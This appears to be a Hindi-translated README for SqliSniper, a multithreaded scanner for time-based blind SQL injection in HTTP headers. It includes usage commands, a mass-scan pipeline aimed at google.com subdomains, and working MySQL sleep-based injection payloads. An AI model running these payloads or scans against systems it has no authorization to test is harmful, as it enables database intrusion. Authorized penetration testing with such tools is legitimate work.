
HTTP हैडर्स के लिए उन्नत समय-आधारित अंध SQL इंजेक्शन फ़ज़र
विशेषताएँ • स्थापना • उपयोग • SqliSniper चलाना • योगदान •
SqliSniper एक मजबूत पायथन उपकरण है जो HTTP अनुरोध हेडर में समय-आधारित ब्लाइंड SQL इंजेक्शन का पता लगाने के लिए डिज़ाइन किया गया है। यह बहु-थ्रेडेड का उपयोग करके संभावित कमजोरियों को तेजी से स्कैन और पहचान करके सुरक्षा मूल्यांकन प्रक्रिया को बढ़ाता है, जिससे गति और दक्षता सुनिश्चित होती है। अन्य स्कैनर्स के विपरीत, SqliSniper को झूठी सकारात्मकताओं को समाप्त करने और पता लगाने पर अलर्ट भेजने के लिए डिज़ाइन किया गया है, जिसमें अंतर्निहित Discord सूचना कार्यक्षमता शामिल है।

git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt
यह उपकरण के लिए सहायता प्रदर्शित करेगा। यहाँ वे सभी विकल्प दिए गए हैं जो यह समर्थन करता है।
ubuntu:~/sqlisniper$ ./sqlisniper.py -h
███████╗ ██████╗ ██╗ ██╗ ███████╗███╗ ██╗██╗██████╗ ███████╗██████╗
██╔════╝██╔═══██╗██║ ██║ ██╔════╝████╗ ██║██║██╔══██╗██╔════╝██╔══██╗
███████╗██║ ██║██║ ██║ ███████╗██╔██╗ ██║██║██████╔╝█████╗ ██████╔╝
╚════██║██║▄▄ ██║██║ ██║ ╚════██║██║╚██╗██║██║██╔═══╝ ██╔══╝ ██╔══██╗
███████║╚██████╔╝███████╗██║ ███████║██║ ╚████║██║██║ ███████╗██║ ██║
╚══════╝ ╚══▀▀═╝ ╚══════╝╚═╝ ╚══════╝╚═╝ ╚═══╝╚═╝╚═╝ ╚══════╝╚═╝ ╚═╝
-: Muhammad Danial द्वारा :-
usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]
Detect SQL injection by sending malicious queries
options:
-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads
एकल साइट स्कैन के लिए -u फ़्लैग के साथ URL प्रदान किया जा सकता है।
./sqlisniper.py -u http://example.com
-r फ़्लैग SqliSniper को एक साथ कई URL वाली फ़ाइल पढ़ने की अनुमति देता है।
./sqlisniper.py -r url.txt
SqliSniper -p फ़्लैग के साथ पाइपलाइन इनपुट के साथ भी काम कर सकता है।
cat url.txt | ./sqlisniper.py -p
पाइपलाइन सुविधा अन्य उपकरणों के साथ सहज एकीकरण की सुविधा प्रदान करती है। उदाहरण के लिए, आप subfinder और httpx जैसे उपकरणों का उपयोग कर सकते हैं, और फिर उनके आउटपुट को बड़े पैमाने पर स्कैनिंग के लिए SqliSniper में पाइप कर सकते हैं।
subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p
डिफ़ॉल्ट रूप से SqliSniper payloads.txt फ़ाइल का उपयोग करता है। हालाँकि कस्टम पेलोड फ़ाइल प्रदान करने के लिए --payload फ़्लैग का उपयोग किया जा सकता है।
./sqlisniper.py -u http://example.com --payload mssql_payloads.txt
कस्टम पेलोड फ़ाइल का उपयोग करते समय, सुनिश्चित करें कि आप स्लीप टाइम को %__TIME_OUT__% से बदल दें। SqliSniper संभावित झूठी सकारात्मकताओं को कम करने के लिए स्लीप टाइम को पुनरावृत्त रूप से समायोजित करता है।
पेलोड फ़ाइल इस प्रकार दिखनी चाहिए।
ubuntu:~/sqlisniper$ cat payloads.txt
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
यदि आप केवल एकल पेलोड के साथ परीक्षण करना चाहते हैं तो --single-payload फ़्लैग का उपयोग किया जा सकता है। स्लीप टाइम को %__TIME_OUT__% से बदलना सुनिश्चित करें।
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
हेडर को headers.txt फ़ाइल में सहेजा जाता है। कस्टम हेडर स्कैन करने के लिए कस्टम HTTP अनुरोध हेडर को headers.txt फ़ाइल में सहेजें।
ubuntu:~/sqlisniper$ cat headers.txt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1
SqliSniper Discord अलर्ट सूचनाएँ भी प्रदान करता है, जो Discord वेबहुक के माध्यम से रीयल-टाइम अलर्ट प्रदान करके इसकी कार्यक्षमता को बढ़ाता है। यह सुविधा बड़े पैमाने पर स्कैन के दौरान अमूल्य साबित होती है, जिससे पता लगाने पर तुरंत सूचनाएँ मिलती हैं।
./sqlisniper.py -r url.txt --discord <web_hookurl>
थ्रेड्स को --threads फ़्लैग के साथ परिभाषित किया जा सकता है।
./sqlisniper.py -r url.txt --threads 10
नोट: यह ध्यान रखना महत्वपूर्ण है कि थ्रेड्स की अधिक संख्या का उपयोग करने से संभावित झूठी सकारात्मकताएँ या वैध मुद्दों की अनदेखी हो सकती है। समय-आधारित SQL इंजेक्शन की प्रकृति के कारण, अधिक सटीक पता लगाने के लिए कम थ्रेड का उपयोग करने की अनुशंसा की जाती है।
कानूनी अस्वीकरणपूर्व पारस्परिक सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग सख्ती से प्रतिबंधित है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं लेते हैं और इस कार्यक्रम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। |
SqliSniper में योगदान का हमेशा स्वागत है। चाहे वह सुविधा संवर्द्धन हो, बग फिक्स हो, या दस्तावेज़ीकरण में सुधार हो, हर छोटी मदद की सराहना की जाती है।
SqliSniper को MIT लाइसेंस के तहत वितरित किया जाता है।
SqliSniper को
और ढेर सारे 💙 के साथ @Muhammad Danial द्वारा बनाया गया है।